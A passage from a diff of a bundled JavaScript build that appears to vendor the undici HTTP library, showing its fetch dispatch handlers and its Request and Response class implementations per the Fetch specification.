If connection uses HTTP/2, then transmit an RST_STREAM frame. - // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. - fetchParams.controller.connection.destroy() - } - - // 20. Return response. - return response - - async function dispatch ({ body }) { - const url = requestCurrentURL(request) - /** @type {import('../..').Agent} */ - const agent = fetchParams.controller.dispatcher - - return new Promise((resolve, reject) => agent.dispatch( - { - path: url.pathname + url.search, - origin: url.origin, - method: request.method, - body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, - headers: request.headersList.entries, - maxRedirections: 0, - upgrade: request.mode === 'websocket' ? 'websocket' : undefined - }, - { - body: null, - abort: null, - - onConnect (abort) { - // TODO (fix): Do we need connection here? - const { connection } = fetchParams.controller - - if (connection.destroyed) { - abort(new DOMException('The operation was aborted.', 'AbortError')) - } else { - fetchParams.controller.on('terminated', abort) - this.abort = connection.abort = abort - } - }, - - onHeaders (status, headersList, resume, statusText) { - if (status < 200) { - return - } - - let codings = [] - let location = '' - - const headers = new Headers() - - // For H2, the headers are a plain JS object - // We distinguish between them and iterate accordingly - if (Array.isArray(headersList)) { - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." 
- codings = val.toLowerCase().split(',').map((x) => x.trim()) - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } else { - const keys = Object.keys(headersList) - for (const key of keys) { - const val = headersList[key] - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } - - this.body = new Readable({ read: resume }) - - const decoders = [] - - const willFollow = request.redirect === 'follow' && - location && - redirectStatusSet.has(status) - - // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding - if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { - for (const coding of codings) { - // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 - if (coding === 'x-gzip' || coding === 'gzip') { - decoders.push(zlib.createGunzip({ - // Be less strict when decoding compressed responses, since sometimes - // servers send slightly invalid responses that are still accepted - // by common browsers. - // Always using Z_SYNC_FLUSH is what cURL does. - flush: zlib.constants.Z_SYNC_FLUSH, - finishFlush: zlib.constants.Z_SYNC_FLUSH - })) - } else if (coding === 'deflate') { - decoders.push(zlib.createInflate()) - } else if (coding === 'br') { - decoders.push(zlib.createBrotliDecompress()) - } else { - decoders.length = 0 - break - } - } - } - - resolve({ - status, - statusText, - headersList: headers[kHeadersList], - body: decoders.length - ? 
pipeline(this.body, ...decoders, () => { }) - : this.body.on('error', () => {}) - }) - - return true - }, - - onData (chunk) { - if (fetchParams.controller.dump) { - return - } - - // 1. If one or more bytes have been transmitted from response’s - // message body, then: - - // 1. Let bytes be the transmitted bytes. - const bytes = chunk - - // 2. Let codings be the result of extracting header list values - // given `Content-Encoding` and response’s header list. - // See pullAlgorithm. - - // 3. Increase timingInfo’s encoded body size by bytes’s length. - timingInfo.encodedBodySize += bytes.byteLength - - // 4. See pullAlgorithm... - - return this.body.push(bytes) - }, - - onComplete () { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - fetchParams.controller.ended = true - - this.body.push(null) - }, - - onError (error) { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - this.body?.destroy(error) - - fetchParams.controller.terminate(error) - - reject(error) - }, - - onUpgrade (status, headersList, socket) { - if (status !== 101) { - return - } - - const headers = new Headers() - - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - - headers[kHeadersList].append(key, val) - } - - resolve({ - status, - statusText: STATUS_CODES[status], - headersList: headers[kHeadersList], - socket - }) - - return true - } - } - )) - } -} - -module.exports = { - fetch, - Fetch, - fetching, - finalizeAndReportTiming -} - - -/***/ }), - -/***/ 8359: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* globals AbortController */ - - - -const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) -const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) -const { FinalizationRegistry } = __nccwpck_require__(6436)() -const util = 
__nccwpck_require__(3983) -const { - isValidHTTPToken, - sameOrigin, - normalizeMethod, - makePolicyContainer, - normalizeMethodRecord -} = __nccwpck_require__(2538) -const { - forbiddenMethodsSet, - corsSafeListedMethodsSet, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - requestDuplex -} = __nccwpck_require__(1037) -const { kEnumerableProperty } = util -const { kHeaders, kSignal, kState, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { getMaxListeners, setMaxListeners, getEventListeners, defaultMaxListeners } = __nccwpck_require__(2361) - -let TransformStream = globalThis.TransformStream - -const kAbortController = Symbol('abortController') - -const requestFinalizer = new FinalizationRegistry(({ signal, abort }) => { - signal.removeEventListener('abort', abort) -}) - -// https://fetch.spec.whatwg.org/#request-class -class Request { - // https://fetch.spec.whatwg.org/#dom-request - constructor (input, init = {}) { - if (input === kConstruct) { - return - } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Request constructor' }) - - input = webidl.converters.RequestInfo(input) - init = webidl.converters.RequestInit(init) - - // https://html.spec.whatwg.org/multipage/webappapis.html#environment-settings-object - this[kRealm] = { - settingsObject: { - baseUrl: getGlobalOrigin(), - get origin () { - return this.baseUrl?.origin - }, - policyContainer: makePolicyContainer() - } - } - - // 1. Let request be null. - let request = null - - // 2. Let fallbackMode be null. - let fallbackMode = null - - // 3. Let baseURL be this’s relevant settings object’s API base URL. - const baseUrl = this[kRealm].settingsObject.baseUrl - - // 4. Let signal be null. 
- let signal = null - - // 5. If input is a string, then: - if (typeof input === 'string') { - // 1. Let parsedURL be the result of parsing input with baseURL. - // 2. If parsedURL is failure, then throw a TypeError. - let parsedURL - try { - parsedURL = new URL(input, baseUrl) - } catch (err) { - throw new TypeError('Failed to parse URL from ' + input, { cause: err }) - } - - // 3. If parsedURL includes credentials, then throw a TypeError. - if (parsedURL.username || parsedURL.password) { - throw new TypeError( - 'Request cannot be constructed from a URL that includes credentials: ' + - input - ) - } - - // 4. Set request to a new request whose URL is parsedURL. - request = makeRequest({ urlList: [parsedURL] }) - - // 5. Set fallbackMode to "cors". - fallbackMode = 'cors' - } else { - // 6. Otherwise: - - // 7. Assert: input is a Request object. - assert(input instanceof Request) - - // 8. Set request to input’s request. - request = input[kState] - - // 9. Set signal to input’s signal. - signal = input[kSignal] - } - - // 7. Let origin be this’s relevant settings object’s origin. - const origin = this[kRealm].settingsObject.origin - - // 8. Let window be "client". - let window = 'client' - - // 9. If request’s window is an environment settings object and its origin - // is same origin with origin, then set window to request’s window. - if ( - request.window?.constructor?.name === 'EnvironmentSettingsObject' && - sameOrigin(request.window, origin) - ) { - window = request.window - } - - // 10. If init["window"] exists and is non-null, then throw a TypeError. - if (init.window != null) { - throw new TypeError(`'window' option '${window}' must be null`) - } - - // 11. If init["window"] exists, then set window to "no-window". - if ('window' in init) { - window = 'no-window' - } - - // 12. Set request to a new request with the following properties: - request = makeRequest({ - // URL request’s URL. 
- // undici implementation note: this is set as the first item in request's urlList in makeRequest - // method request’s method. - method: request.method, - // header list A copy of request’s header list. - // undici implementation note: headersList is cloned in makeRequest - headersList: request.headersList, - // unsafe-request flag Set. - unsafeRequest: request.unsafeRequest, - // client This’s relevant settings object. - client: this[kRealm].settingsObject, - // window window. - window, - // priority request’s priority. - priority: request.priority, - // origin request’s origin. The propagation of the origin is only significant for navigation requests - // being handled by a service worker. In this scenario a request can have an origin that is different - // from the current client. - origin: request.origin, - // referrer request’s referrer. - referrer: request.referrer, - // referrer policy request’s referrer policy. - referrerPolicy: request.referrerPolicy, - // mode request’s mode. - mode: request.mode, - // credentials mode request’s credentials mode. - credentials: request.credentials, - // cache mode request’s cache mode. - cache: request.cache, - // redirect mode request’s redirect mode. - redirect: request.redirect, - // integrity metadata request’s integrity metadata. - integrity: request.integrity, - // keepalive request’s keepalive. - keepalive: request.keepalive, - // reload-navigation flag request’s reload-navigation flag. - reloadNavigation: request.reloadNavigation, - // history-navigation flag request’s history-navigation flag. - historyNavigation: request.historyNavigation, - // URL list A clone of request’s URL list. - urlList: [...request.urlList] - }) - - const initHasKey = Object.keys(init).length !== 0 - - // 13. If init is not empty, then: - if (initHasKey) { - // 1. If request’s mode is "navigate", then set it to "same-origin". - if (request.mode === 'navigate') { - request.mode = 'same-origin' - } - - // 2. 
Unset request’s reload-navigation flag. - request.reloadNavigation = false - - // 3. Unset request’s history-navigation flag. - request.historyNavigation = false - - // 4. Set request’s origin to "client". - request.origin = 'client' - - // 5. Set request’s referrer to "client" - request.referrer = 'client' - - // 6. Set request’s referrer policy to the empty string. - request.referrerPolicy = '' - - // 7. Set request’s URL to request’s current URL. - request.url = request.urlList[request.urlList.length - 1] - - // 8. Set request’s URL list to « request’s URL ». - request.urlList = [request.url] - } - - // 14. If init["referrer"] exists, then: - if (init.referrer !== undefined) { - // 1. Let referrer be init["referrer"]. - const referrer = init.referrer - - // 2. If referrer is the empty string, then set request’s referrer to "no-referrer". - if (referrer === '') { - request.referrer = 'no-referrer' - } else { - // 1. Let parsedReferrer be the result of parsing referrer with - // baseURL. - // 2. If parsedReferrer is failure, then throw a TypeError. - let parsedReferrer - try { - parsedReferrer = new URL(referrer, baseUrl) - } catch (err) { - throw new TypeError(`Referrer "${referrer}" is not a valid URL.`, { cause: err }) - } - - // 3. If one of the following is true - // - parsedReferrer’s scheme is "about" and path is the string "client" - // - parsedReferrer’s origin is not same origin with origin - // then set request’s referrer to "client". - if ( - (parsedReferrer.protocol === 'about:' && parsedReferrer.hostname === 'client') || - (origin && !sameOrigin(parsedReferrer, this[kRealm].settingsObject.baseUrl)) - ) { - request.referrer = 'client' - } else { - // 4. Otherwise, set request’s referrer to parsedReferrer. - request.referrer = parsedReferrer - } - } - } - - // 15. If init["referrerPolicy"] exists, then set request’s referrer policy - // to it. - if (init.referrerPolicy !== undefined) { - request.referrerPolicy = init.referrerPolicy - } - - // 16. 
Let mode be init["mode"] if it exists, and fallbackMode otherwise. - let mode - if (init.mode !== undefined) { - mode = init.mode - } else { - mode = fallbackMode - } - - // 17. If mode is "navigate", then throw a TypeError. - if (mode === 'navigate') { - throw webidl.errors.exception({ - header: 'Request constructor', - message: 'invalid request mode navigate.' - }) - } - - // 18. If mode is non-null, set request’s mode to mode. - if (mode != null) { - request.mode = mode - } - - // 19. If init["credentials"] exists, then set request’s credentials mode - // to it. - if (init.credentials !== undefined) { - request.credentials = init.credentials - } - - // 18. If init["cache"] exists, then set request’s cache mode to it. - if (init.cache !== undefined) { - request.cache = init.cache - } - - // 21. If request’s cache mode is "only-if-cached" and request’s mode is - // not "same-origin", then throw a TypeError. - if (request.cache === 'only-if-cached' && request.mode !== 'same-origin') { - throw new TypeError( - "'only-if-cached' can be set only with 'same-origin' mode" - ) - } - - // 22. If init["redirect"] exists, then set request’s redirect mode to it. - if (init.redirect !== undefined) { - request.redirect = init.redirect - } - - // 23. If init["integrity"] exists, then set request’s integrity metadata to it. - if (init.integrity != null) { - request.integrity = String(init.integrity) - } - - // 24. If init["keepalive"] exists, then set request’s keepalive to it. - if (init.keepalive !== undefined) { - request.keepalive = Boolean(init.keepalive) - } - - // 25. If init["method"] exists, then: - if (init.method !== undefined) { - // 1. Let method be init["method"]. - let method = init.method - - // 2. If method is not a method or method is a forbidden method, then - // throw a TypeError. 
- if (!isValidHTTPToken(method)) { - throw new TypeError(`'${method}' is not a valid HTTP method.`) - } - - if (forbiddenMethodsSet.has(method.toUpperCase())) { - throw new TypeError(`'${method}' HTTP method is unsupported.`) - } - - // 3. Normalize method. - method = normalizeMethodRecord[method] ?? normalizeMethod(method) - - // 4. Set request’s method to method. - request.method = method - } - - // 26. If init["signal"] exists, then set signal to it. - if (init.signal !== undefined) { - signal = init.signal - } - - // 27. Set this’s request to request. - this[kState] = request - - // 28. Set this’s signal to a new AbortSignal object with this’s relevant - // Realm. - // TODO: could this be simplified with AbortSignal.any - // (https://dom.spec.whatwg.org/#dom-abortsignal-any) - const ac = new AbortController() - this[kSignal] = ac.signal - this[kSignal][kRealm] = this[kRealm] - - // 29. If signal is not null, then make this’s signal follow signal. - if (signal != null) { - if ( - !signal || - typeof signal.aborted !== 'boolean' || - typeof signal.addEventListener !== 'function' - ) { - throw new TypeError( - "Failed to construct 'Request': member signal is not of type AbortSignal." - ) - } - - if (signal.aborted) { - ac.abort(signal.reason) - } else { - // Keep a strong ref to ac while request object - // is alive. This is needed to prevent AbortController - // from being prematurely garbage collected. - // See, https://github.com/nodejs/undici/issues/1926. - this[kAbortController] = ac - - const acRef = new WeakRef(ac) - const abort = function () { - const ac = acRef.deref() - if (ac !== undefined) { - ac.abort(this.reason) - } - } - - // Third-party AbortControllers may not work with these. - // See, https://github.com/nodejs/undici/pull/1910#issuecomment-1464495619. 
- try { - // If the max amount of listeners is equal to the default, increase it - // This is only available in node >= v19.9.0 - if (typeof getMaxListeners === 'function' && getMaxListeners(signal) === defaultMaxListeners) { - setMaxListeners(100, signal) - } else if (getEventListeners(signal, 'abort').length >= defaultMaxListeners) { - setMaxListeners(100, signal) - } - } catch {} - - util.addAbortListener(signal, abort) - requestFinalizer.register(ac, { signal, abort }) - } - } - - // 30. Set this’s headers to a new Headers object with this’s relevant - // Realm, whose header list is request’s header list and guard is - // "request". - this[kHeaders] = new Headers(kConstruct) - this[kHeaders][kHeadersList] = request.headersList - this[kHeaders][kGuard] = 'request' - this[kHeaders][kRealm] = this[kRealm] - - // 31. If this’s request’s mode is "no-cors", then: - if (mode === 'no-cors') { - // 1. If this’s request’s method is not a CORS-safelisted method, - // then throw a TypeError. - if (!corsSafeListedMethodsSet.has(request.method)) { - throw new TypeError( - `'${request.method} is unsupported in no-cors mode.` - ) - } - - // 2. Set this’s headers’s guard to "request-no-cors". - this[kHeaders][kGuard] = 'request-no-cors' - } - - // 32. If init is not empty, then: - if (initHasKey) { - /** @type {HeadersList} */ - const headersList = this[kHeaders][kHeadersList] - // 1. Let headers be a copy of this’s headers and its associated header - // list. - // 2. If init["headers"] exists, then set headers to init["headers"]. - const headers = init.headers !== undefined ? init.headers : new HeadersList(headersList) - - // 3. Empty this’s headers’s header list. - headersList.clear() - - // 4. If headers is a Headers object, then for each header in its header - // list, append header’s name/header’s value to this’s headers. 
- if (headers instanceof HeadersList) { - for (const [key, val] of headers) { - headersList.append(key, val) - } - // Note: Copy the `set-cookie` meta-data. - headersList.cookies = headers.cookies - } else { - // 5. Otherwise, fill this’s headers with headers. - fillHeaders(this[kHeaders], headers) - } - } - - // 33. Let inputBody be input’s request’s body if input is a Request - // object; otherwise null. - const inputBody = input instanceof Request ? input[kState].body : null - - // 34. If either init["body"] exists and is non-null or inputBody is - // non-null, and request’s method is `GET` or `HEAD`, then throw a - // TypeError. - if ( - (init.body != null || inputBody != null) && - (request.method === 'GET' || request.method === 'HEAD') - ) { - throw new TypeError('Request with GET/HEAD method cannot have body.') - } - - // 35. Let initBody be null. - let initBody = null - - // 36. If init["body"] exists and is non-null, then: - if (init.body != null) { - // 1. Let Content-Type be null. - // 2. Set initBody and Content-Type to the result of extracting - // init["body"], with keepalive set to request’s keepalive. - const [extractedBody, contentType] = extractBody( - init.body, - request.keepalive - ) - initBody = extractedBody - - // 3, If Content-Type is non-null and this’s headers’s header list does - // not contain `Content-Type`, then append `Content-Type`/Content-Type to - // this’s headers. - if (contentType && !this[kHeaders][kHeadersList].contains('content-type')) { - this[kHeaders].append('content-type', contentType) - } - } - - // 37. Let inputOrInitBody be initBody if it is non-null; otherwise - // inputBody. - const inputOrInitBody = initBody ?? inputBody - - // 38. If inputOrInitBody is non-null and inputOrInitBody’s source is - // null, then: - if (inputOrInitBody != null && inputOrInitBody.source == null) { - // 1. If initBody is non-null and init["duplex"] does not exist, - // then throw a TypeError. 
- if (initBody != null && init.duplex == null) { - throw new TypeError('RequestInit: duplex option is required when sending a body.') - } - - // 2. If this’s request’s mode is neither "same-origin" nor "cors", - // then throw a TypeError. - if (request.mode !== 'same-origin' && request.mode !== 'cors') { - throw new TypeError( - 'If request is made from ReadableStream, mode should be "same-origin" or "cors"' - ) - } - - // 3. Set this’s request’s use-CORS-preflight flag. - request.useCORSPreflightFlag = true - } - - // 39. Let finalBody be inputOrInitBody. - let finalBody = inputOrInitBody - - // 40. If initBody is null and inputBody is non-null, then: - if (initBody == null && inputBody != null) { - // 1. If input is unusable, then throw a TypeError. - if (util.isDisturbed(inputBody.stream) || inputBody.stream.locked) { - throw new TypeError( - 'Cannot construct a Request with a Request object that has already been used.' - ) - } - - // 2. Set finalBody to the result of creating a proxy for inputBody. - if (!TransformStream) { - TransformStream = (__nccwpck_require__(5356).TransformStream) - } - - // https://streams.spec.whatwg.org/#readablestream-create-a-proxy - const identityTransform = new TransformStream() - inputBody.stream.pipeThrough(identityTransform) - finalBody = { - source: inputBody.source, - length: inputBody.length, - stream: identityTransform.readable - } - } - - // 41. Set this’s request’s body to finalBody. - this[kState].body = finalBody - } - - // Returns request’s HTTP method, which is "GET" by default. - get method () { - webidl.brandCheck(this, Request) - - // The method getter steps are to return this’s request’s method. - return this[kState].method - } - - // Returns the URL of request as a string. - get url () { - webidl.brandCheck(this, Request) - - // The url getter steps are to return this’s request’s URL, serialized. 
- return URLSerializer(this[kState].url) - } - - // Returns a Headers object consisting of the headers associated with request. - // Note that headers added in the network layer by the user agent will not - // be accounted for in this object, e.g., the "Host" header. - get headers () { - webidl.brandCheck(this, Request) - - // The headers getter steps are to return this’s headers. - return this[kHeaders] - } - - // Returns the kind of resource requested by request, e.g., "document" - // or "script". - get destination () { - webidl.brandCheck(this, Request) - - // The destination getter are to return this’s request’s destination. - return this[kState].destination - } - - // Returns the referrer of request. Its value can be a same-origin URL if - // explicitly set in init, the empty string to indicate no referrer, and - // "about:client" when defaulting to the global’s default. This is used - // during fetching to determine the value of the `Referer` header of the - // request being made. - get referrer () { - webidl.brandCheck(this, Request) - - // 1. If this’s request’s referrer is "no-referrer", then return the - // empty string. - if (this[kState].referrer === 'no-referrer') { - return '' - } - - // 2. If this’s request’s referrer is "client", then return - // "about:client". - if (this[kState].referrer === 'client') { - return 'about:client' - } - - // Return this’s request’s referrer, serialized. - return this[kState].referrer.toString() - } - - // Returns the referrer policy associated with request. - // This is used during fetching to compute the value of the request’s - // referrer. - get referrerPolicy () { - webidl.brandCheck(this, Request) - - // The referrerPolicy getter steps are to return this’s request’s referrer policy. - return this[kState].referrerPolicy - } - - // Returns the mode associated with request, which is a string indicating - // whether the request will use CORS, or will be restricted to same-origin - // URLs. 
- get mode () { - webidl.brandCheck(this, Request) - - // The mode getter steps are to return this’s request’s mode. - return this[kState].mode - } - - // Returns the credentials mode associated with request, - // which is a string indicating whether credentials will be sent with the - // request always, never, or only when sent to a same-origin URL. - get credentials () { - // The credentials getter steps are to return this’s request’s credentials mode. - return this[kState].credentials - } - - // Returns the cache mode associated with request, - // which is a string indicating how the request will - // interact with the browser’s cache when fetching. - get cache () { - webidl.brandCheck(this, Request) - - // The cache getter steps are to return this’s request’s cache mode. - return this[kState].cache - } - - // Returns the redirect mode associated with request, - // which is a string indicating how redirects for the - // request will be handled during fetching. A request - // will follow redirects by default. - get redirect () { - webidl.brandCheck(this, Request) - - // The redirect getter steps are to return this’s request’s redirect mode. - return this[kState].redirect - } - - // Returns request’s subresource integrity metadata, which is a - // cryptographic hash of the resource being fetched. Its value - // consists of multiple hashes separated by whitespace. [SRI] - get integrity () { - webidl.brandCheck(this, Request) - - // The integrity getter steps are to return this’s request’s integrity - // metadata. - return this[kState].integrity - } - - // Returns a boolean indicating whether or not request can outlive the - // global in which it was created. - get keepalive () { - webidl.brandCheck(this, Request) - - // The keepalive getter steps are to return this’s request’s keepalive. - return this[kState].keepalive - } - - // Returns a boolean indicating whether or not request is for a reload - // navigation. 
- get isReloadNavigation () { - webidl.brandCheck(this, Request) - - // The isReloadNavigation getter steps are to return true if this’s - // request’s reload-navigation flag is set; otherwise false. - return this[kState].reloadNavigation - } - - // Returns a boolean indicating whether or not request is for a history - // navigation (a.k.a. back-foward navigation). - get isHistoryNavigation () { - webidl.brandCheck(this, Request) - - // The isHistoryNavigation getter steps are to return true if this’s request’s - // history-navigation flag is set; otherwise false. - return this[kState].historyNavigation - } - - // Returns the signal associated with request, which is an AbortSignal - // object indicating whether or not request has been aborted, and its - // abort event handler. - get signal () { - webidl.brandCheck(this, Request) - - // The signal getter steps are to return this’s signal. - return this[kSignal] - } - - get body () { - webidl.brandCheck(this, Request) - - return this[kState].body ? this[kState].body.stream : null - } - - get bodyUsed () { - webidl.brandCheck(this, Request) - - return !!this[kState].body && util.isDisturbed(this[kState].body.stream) - } - - get duplex () { - webidl.brandCheck(this, Request) - - return 'half' - } - - // Returns a clone of request. - clone () { - webidl.brandCheck(this, Request) - - // 1. If this is unusable, then throw a TypeError. - if (this.bodyUsed || this.body?.locked) { - throw new TypeError('unusable') - } - - // 2. Let clonedRequest be the result of cloning this’s request. - const clonedRequest = cloneRequest(this[kState]) - - // 3. Let clonedRequestObject be the result of creating a Request object, - // given clonedRequest, this’s headers’s guard, and this’s relevant Realm. 
- const clonedRequestObject = new Request(kConstruct) - clonedRequestObject[kState] = clonedRequest - clonedRequestObject[kRealm] = this[kRealm] - clonedRequestObject[kHeaders] = new Headers(kConstruct) - clonedRequestObject[kHeaders][kHeadersList] = clonedRequest.headersList - clonedRequestObject[kHeaders][kGuard] = this[kHeaders][kGuard] - clonedRequestObject[kHeaders][kRealm] = this[kHeaders][kRealm] - - // 4. Make clonedRequestObject’s signal follow this’s signal. - const ac = new AbortController() - if (this.signal.aborted) { - ac.abort(this.signal.reason) - } else { - util.addAbortListener( - this.signal, - () => { - ac.abort(this.signal.reason) - } - ) - } - clonedRequestObject[kSignal] = ac.signal - - // 4. Return clonedRequestObject. - return clonedRequestObject - } -} - -mixinBody(Request) - -function makeRequest (init) { - // https://fetch.spec.whatwg.org/#requests - const request = { - method: 'GET', - localURLsOnly: false, - unsafeRequest: false, - body: null, - client: null, - reservedClient: null, - replacesClientId: '', - window: 'client', - keepalive: false, - serviceWorkers: 'all', - initiator: '', - destination: '', - priority: null, - origin: 'client', - policyContainer: 'client', - referrer: 'client', - referrerPolicy: '', - mode: 'no-cors', - useCORSPreflightFlag: false, - credentials: 'same-origin', - useCredentials: false, - cache: 'default', - redirect: 'follow', - integrity: '', - cryptoGraphicsNonceMetadata: '', - parserMetadata: '', - reloadNavigation: false, - historyNavigation: false, - userActivation: false, - taintedOrigin: false, - redirectCount: 0, - responseTainting: 'basic', - preventNoCacheCacheControlHeaderModification: false, - done: false, - timingAllowFailed: false, - ...init, - headersList: init.headersList - ? 
new HeadersList(init.headersList) - : new HeadersList() - } - request.url = request.urlList[0] - return request -} - -// https://fetch.spec.whatwg.org/#concept-request-clone -function cloneRequest (request) { - // To clone a request request, run these steps: - - // 1. Let newRequest be a copy of request, except for its body. - const newRequest = makeRequest({ ...request, body: null }) - - // 2. If request’s body is non-null, set newRequest’s body to the - // result of cloning request’s body. - if (request.body != null) { - newRequest.body = cloneBody(request.body) - } - - // 3. Return newRequest. - return newRequest -} - -Object.defineProperties(Request.prototype, { - method: kEnumerableProperty, - url: kEnumerableProperty, - headers: kEnumerableProperty, - redirect: kEnumerableProperty, - clone: kEnumerableProperty, - signal: kEnumerableProperty, - duplex: kEnumerableProperty, - destination: kEnumerableProperty, - body: kEnumerableProperty, - bodyUsed: kEnumerableProperty, - isHistoryNavigation: kEnumerableProperty, - isReloadNavigation: kEnumerableProperty, - keepalive: kEnumerableProperty, - integrity: kEnumerableProperty, - cache: kEnumerableProperty, - credentials: kEnumerableProperty, - attribute: kEnumerableProperty, - referrerPolicy: kEnumerableProperty, - referrer: kEnumerableProperty, - mode: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'Request', - configurable: true - } -}) - -webidl.converters.Request = webidl.interfaceConverter( - Request -) - -// https://fetch.spec.whatwg.org/#requestinfo -webidl.converters.RequestInfo = function (V) { - if (typeof V === 'string') { - return webidl.converters.USVString(V) - } - - if (V instanceof Request) { - return webidl.converters.Request(V) - } - - return webidl.converters.USVString(V) -} - -webidl.converters.AbortSignal = webidl.interfaceConverter( - AbortSignal -) - -// https://fetch.spec.whatwg.org/#requestinit -webidl.converters.RequestInit = webidl.dictionaryConverter([ - { - key: 'method', - 
converter: webidl.converters.ByteString - }, - { - key: 'headers', - converter: webidl.converters.HeadersInit - }, - { - key: 'body', - converter: webidl.nullableConverter( - webidl.converters.BodyInit - ) - }, - { - key: 'referrer', - converter: webidl.converters.USVString - }, - { - key: 'referrerPolicy', - converter: webidl.converters.DOMString, - // https://w3c.github.io/webappsec-referrer-policy/#referrer-policy - allowedValues: referrerPolicy - }, - { - key: 'mode', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#concept-request-mode - allowedValues: requestMode - }, - { - key: 'credentials', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcredentials - allowedValues: requestCredentials - }, - { - key: 'cache', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestcache - allowedValues: requestCache - }, - { - key: 'redirect', - converter: webidl.converters.DOMString, - // https://fetch.spec.whatwg.org/#requestredirect - allowedValues: requestRedirect - }, - { - key: 'integrity', - converter: webidl.converters.DOMString - }, - { - key: 'keepalive', - converter: webidl.converters.boolean - }, - { - key: 'signal', - converter: webidl.nullableConverter( - (signal) => webidl.converters.AbortSignal( - signal, - { strict: false } - ) - ) - }, - { - key: 'window', - converter: webidl.converters.any - }, - { - key: 'duplex', - converter: webidl.converters.DOMString, - allowedValues: requestDuplex - } -]) - -module.exports = { Request, makeRequest } - - -/***/ }), - -/***/ 7823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Headers, HeadersList, fill } = __nccwpck_require__(554) -const { extractBody, cloneBody, mixinBody } = __nccwpck_require__(1472) -const util = __nccwpck_require__(3983) -const { kEnumerableProperty } = util -const { - isValidReasonPhrase, - isCancelled, - isAborted, - isBlobLike, - 
serializeJavascriptValueToJSONString, - isErrorLike, - isomorphicEncode -} = __nccwpck_require__(2538) -const { - redirectStatusSet, - nullBodyStatus, - DOMException -} = __nccwpck_require__(1037) -const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { FormData } = __nccwpck_require__(2015) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { URLSerializer } = __nccwpck_require__(685) -const { kHeadersList, kConstruct } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { types } = __nccwpck_require__(3837) - -const ReadableStream = globalThis.ReadableStream || (__nccwpck_require__(5356).ReadableStream) -const textEncoder = new TextEncoder('utf-8') - -// https://fetch.spec.whatwg.org/#response-class -class Response { - // Creates network error Response. - static error () { - // TODO - const relevantRealm = { settingsObject: {} } - - // The static error() method steps are to return the result of creating a - // Response object, given a new network error, "immutable", and this’s - // relevant Realm. - const responseObject = new Response() - responseObject[kState] = makeNetworkError() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kHeadersList] = responseObject[kState].headersList - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] = relevantRealm - return responseObject - } - - // https://fetch.spec.whatwg.org/#dom-response-json - static json (data, init = {}) { - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.json' }) - - if (init !== null) { - init = webidl.converters.ResponseInit(init) - } - - // 1. Let bytes the result of running serialize a JavaScript value to JSON bytes on data. - const bytes = textEncoder.encode( - serializeJavascriptValueToJSONString(data) - ) - - // 2. Let body be the result of extracting bytes. - const body = extractBody(bytes) - - // 3. 
Let responseObject be the result of creating a Response object, given a new response, - // "response", and this’s relevant Realm. - const relevantRealm = { settingsObject: {} } - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'response' - responseObject[kHeaders][kRealm] = relevantRealm - - // 4. Perform initialize a response given responseObject, init, and (body, "application/json"). - initializeResponse(responseObject, init, { body: body[0], type: 'application/json' }) - - // 5. Return responseObject. - return responseObject - } - - // Creates a redirect Response that redirects to url with status status. - static redirect (url, status = 302) { - const relevantRealm = { settingsObject: {} } - - webidl.argumentLengthCheck(arguments, 1, { header: 'Response.redirect' }) - - url = webidl.converters.USVString(url) - status = webidl.converters['unsigned short'](status) - - // 1. Let parsedURL be the result of parsing url with current settings - // object’s API base URL. - // 2. If parsedURL is failure, then throw a TypeError. - // TODO: base-URL? - let parsedURL - try { - parsedURL = new URL(url, getGlobalOrigin()) - } catch (err) { - throw Object.assign(new TypeError('Failed to parse URL from ' + url), { - cause: err - }) - } - - // 3. If status is not a redirect status, then throw a RangeError. - if (!redirectStatusSet.has(status)) { - throw new RangeError('Invalid status code ' + status) - } - - // 4. Let responseObject be the result of creating a Response object, - // given a new response, "immutable", and this’s relevant Realm. - const responseObject = new Response() - responseObject[kRealm] = relevantRealm - responseObject[kHeaders][kGuard] = 'immutable' - responseObject[kHeaders][kRealm] 